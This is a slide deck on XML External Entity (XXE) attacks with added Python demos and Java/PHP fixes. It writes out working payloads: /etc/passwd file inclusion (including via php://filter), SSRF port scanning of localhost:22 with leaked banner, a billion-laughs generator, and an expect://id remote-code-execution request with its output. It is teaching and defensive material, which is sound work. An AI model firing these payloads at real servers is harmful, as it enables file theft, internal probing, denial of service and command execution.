XML eXternal Entity Attack (XXE) and other related attacks
By: Samit Anwer (samit.anwer@gmail.com)
Agenda
• Document Type Definition
• Prerequisites to perform an XXE attack
• Outcomes
• Fixing XXE vulnerabilities
Document Type Definition (DTD)
• A DTD defines the structure of an XML document: its legal elements, attributes and entities
• Internal DTD: declared inside the DOCTYPE of the document itself
• External DTD: referenced by a system identifier (a URI) and fetched by the parser
Why External Entities?
• Common references shared between multiple XML documents: the parser fetches the resource named by the entity's system identifier and substitutes it wherever the entity is referenced
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml"> ]>
<copyright>&c;</copyright>
• Security issues arise because the parser dereferences whatever URL the system identifier names; in PHP, libxml's entity loader places no restrictions on what URLs can be accessed, even if allow_url_fopen is set to false in php.ini
Prerequisites to perform an XXE
• The application parses XML documents
• Tainted (attacker-controlled) data is allowed within the system identifier of the entity, within the DTD; in practice the attacker supplies the whole DOCTYPE
• The XML processor is configured to validate and process the DTD
• The XML processor is configured to resolve external entities within the DTD
Outcomes
• Disclosure of confidential data / file inclusion
• Server Side Request Forgery (SSRF)
• Port Scanning
• DoS on the parsing system
• Remote Code Execution
File inclusion
• The file's content is substituted into the document, so it must be well-formed as XML entity text: a bare "<" or "&", or bytes invalid in the document's encoding, abort the parse
• What if it is not?
• With PHP's php://filter stream wrapper the file can be Base64-encoded before the parser sees it, so binary or markup-laden files come back intact
• What if the confidential file is not reflected in the response? (blind XXE: the content then has to be carried out of band, for example inside an error message or in a request the parser makes to a host the attacker controls)
<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]> <scan>&test;</scan>
<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>
DEMO
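The file-inclusion payload above run against three parser configurations, as an added example in Python's standard-library SAX parser (this is not the deck's PHP/simplexml demo): with external general entities resolved the file's content leaks into the element text, with them ignored the reference expands to nothing, and with a lexical handler that refuses any DOCTYPE the document is rejected before an entity is ever declared (the "disable DTDs" fix from the Fixes slide). The "secret" file is a temporary file the example creates itself; the class and function names are the example's own.

```python
"""XXE file inclusion against Python's stdlib SAX parser, in three
configurations: resolve external entities (leaks), ignore them, refuse DOCTYPE.
Added example; not the deck's PHP demo. Names are the example's own."""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class DoctypeRejected(Exception):
    """Raised as soon as a DOCTYPE appears in untrusted input."""


class RefuseDoctype:
    """SAX LexicalHandler whose only job is to abort on <!DOCTYPE ...>.
    Refusing the DTD outright also removes the billion-laughs surface,
    because entities can only be declared inside a DOCTYPE."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(
            "DOCTYPE %r refused (system id %r)" % (name, system_id))

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


class TextCollector(handler.ContentHandler):
    """Collects the character data the parser delivers (i.e. the entity's expansion)."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_text(xml_bytes, resolve_external=False, allow_doctype=True):
    """Parse untrusted XML and return its text content.

    resolve_external=True is the weak configuration the attack needs
    (SAX feature external-general-entities); allow_doctype=False is the
    'disable DTDs' fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    if not allow_doctype:
        parser.setProperty(handler.property_lexical_handler, RefuseDoctype())
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def xxe_payload(system_id):
    """The deck's file-inclusion payload with an arbitrary system identifier."""
    return ('<!DOCTYPE scan [<!ENTITY test SYSTEM "%s">]>'
            '<scan>&test;</scan>' % system_id).encode()


def demo():
    """Run the payload through all three configurations against a file we
    create ourselves (a constructed stand-in for /etc/passwd)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("secret-token-123\n")
    try:
        payload = xxe_payload(pathlib.Path(f.name).as_uri())
        leaked = parse_text(payload, resolve_external=True)
        ignored = parse_text(payload, resolve_external=False)
        try:
            parse_text(payload, allow_doctype=False)
            refused = False
        except DoctypeRejected:
            refused = True
    finally:
        os.unlink(f.name)
    return leaked, ignored, refused


if __name__ == "__main__":
    leaked, ignored, refused = demo()
    print("external entities resolved:", repr(leaked))
    print("external entities ignored :", repr(ignored))
    print("DOCTYPE refused           :", refused)
```

Ignoring external entities stops this particular payload but still parses the DOCTYPE, so internal entity declarations (and with them the billion laughs attack) remain reachable; refusing the DOCTYPE is the configuration to prefer whenever the application does not legitimately need a DTD.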
SSRF
• The parser issues the request for the system identifier from the vulnerable server, so an attacker can create requests to hosts only the server can reach (loopback, the internal network)
DEMO
Port Scanning
• It is possible to specify the host and port to which the XML parser will connect
• As long as PHP error messages are enabled, the warning for the failed HTTP request echoes the first line the service sent, i.e. its banner, even if the port doesn't speak HTTP
• What if error messages are disabled? Time is your friend: a closed port fails immediately, a filtered one waits for the connect timeout, and an open non-HTTP port hangs until the service or the stream timeout gives up, so the response time still tells open from closed
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]>
<scan>&test;</scan>
Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed! SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10
DoS
• Billion laughs attack: a chain of nested internal entities, each referencing the previous one ten times, is a few hundred bytes on the wire but expands to gigabytes when the parser substitutes it
https://en.wikipedia.org/wiki/Billion_laughs
• Try opening file:///dev/random: the device never delivers end-of-file, so the parser blocks on the read until the request or the worker times out
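The arithmetic behind the billion laughs document, as an added example (not from the deck): the script builds the classic payload and then computes the expanded size of every entity declared in the internal DTD subset before any parser touches the document, the same bookkeeping a parser's entity-expansion limit performs. It is regex based and only handles a well-formed internal subset with double-quoted entity values; the function names and the 10,000,000-character limit are the example's own.

```python
"""Entity-expansion accounting for the billion laughs attack.
Added example; not code from the deck. Handles double-quoted general
entities in a well-formed internal subset only (a pre-parse gate, not a
replacement for the parser's own limits)."""
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+([A-Za-z_:][\w.:-]*)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&([A-Za-z_:][\w.:-]*);')
INTERNAL_SUBSET = re.compile(r'<!DOCTYPE[^\[>]*\[(.*?)\]\s*>', re.S)
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "quot": 1, "apos": 1}


def billion_laughs(depth=9, width=10, leaf="lol"):
    """The classic payload: lol0 = leaf, lol(n) = `width` references to lol(n-1)."""
    decls = ['<!ENTITY lol0 "%s">' % leaf]
    for i in range(1, depth + 1):
        decls.append('<!ENTITY lol%d "%s">' % (i, ("&lol%d;" % (i - 1)) * width))
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls) +
            '\n]>\n<lolz>&lol%d;</lolz>\n' % depth)


def internal_entities(xml_text):
    """name -> literal value of each general entity declared in the internal subset.
    Parameter entities (<!ENTITY % ...>) do not match and are ignored."""
    m = INTERNAL_SUBSET.search(xml_text)
    if not m:
        return {}
    return dict(ENTITY_DECL.findall(m.group(1)))


def expansion_sizes(entities):
    """Fully expanded length of every entity, following nested references.
    A reference cycle is a well-formedness error in XML; report it, don't loop."""
    sizes = {}
    in_progress = set()

    def size(name):
        if name in sizes:
            return sizes[name]
        if name in in_progress:
            raise ValueError("recursive entity reference: " + name)
        in_progress.add(name)
        value = entities[name]
        total = len(ENTITY_REF.sub("", value))          # literal text in the value
        for ref in ENTITY_REF.findall(value):
            if ref in entities:
                total += size(ref)
            else:                                       # &amp; etc., or undeclared
                total += PREDEFINED.get(ref, len(ref) + 2)
        in_progress.discard(name)
        sizes[name] = total
        return total

    for name in entities:
        size(name)
    return sizes


def expanded_document_size(xml_text):
    """Characters the parser would materialise for the body after the DOCTYPE,
    counting every entity reference at its fully expanded size."""
    entities = internal_entities(xml_text)
    sizes = expansion_sizes(entities)
    m = INTERNAL_SUBSET.search(xml_text)
    body = xml_text[m.end():] if m else xml_text
    total = len(ENTITY_REF.sub("", body))
    for ref in ENTITY_REF.findall(body):
        total += sizes[ref] if ref in sizes else PREDEFINED.get(ref, len(ref) + 2)
    return total


def exceeds_expansion_limit(xml_text, limit=10_000_000):
    """Pre-parse gate: True if expanding the document would exceed `limit` characters.
    The limit is this example's choice; libxml2 and Xerces enforce their own."""
    return expanded_document_size(xml_text) > limit


if __name__ == "__main__":
    doc = billion_laughs()
    print("payload bytes on the wire:", len(doc))
    print("expanded size            :", expanded_document_size(doc))
    print("exceeds limit            :", exceeds_expansion_limit(doc))
```

With the default depth of 9 and width of 10 the payload is under 1 KB but expands to 3 x 10^9 characters (lol0 is 3 characters, and every level multiplies by 10). The gate rejects it without ever instantiating that text, which is exactly what a parser with no expansion limit would try to do.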
Remote Code Execution
• Requires PHP's expect extension: its expect:// stream wrapper runs the command named in the URL and hands the command's output to the parser as the entity's content
• Here the output of id lands in the XML-RPC method name, so the server's "method does not exist" fault echoes it back
Request:
<!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]>
<methodCall>
<methodName>&foo;</methodName>
</methodCall>
Response:
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value>
<string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)
&quot; does not exist</string>
</value></member></struct></value></fault></methodResponse>
Fixes – JAVA
• Disable DTDs (disallow-doctype-decl); with no DOCTYPE there are no entity declarations at all, so this also defeats the billion laughs attack
• If it is not possible to disable DTDs completely, then
• Disable external general and external parameter entities
• Disable loading of external DTDs
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Only if the DOCTYPE must remain enabled:
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
Fixes - PHP
• libxml_disable_entity_loader(true); before parsing untrusted XML (with libxml 2.9 and later external entity loading is already off by default, and the function is deprecated in PHP 8.0)
• Never pass LIBXML_NOENT or LIBXML_DTDLOAD to simplexml_load_string(), DOMDocument::loadXML() or the SimpleXMLElement constructor for untrusted input: they turn entity substitution and DTD loading back on
• Refer - https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP
Fixes – iOS, .NET, C/C++
• See the OWASP XXE Prevention Cheat Sheet above for these platforms
References
• DTD tutorial
http://edutechwiki.unige.ch/en/DTD_tutorial
• XML External Entity (XXE) Processing
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
• XML External Entity (XXE) Prevention Cheat Sheet
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP
• Scanning the internal network using SimpleXML
https://www.idontplaydarts.com/2011/02/scanning-the-internal-network-using-simplexml/
• Identifying Xml eXternal Entity vulnerability (XXE)
http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
Thank You!
Q/A?
Appendix

Source deck: XML External Entity Null Meet 19_3_16.pptx

Editor's Notes

  • #2 An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
  • #4 The system identifier is assumed to be a URI that can be dereferenced by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information.
  • #12 The expect extension allows PHP to interact with processes through a PTY.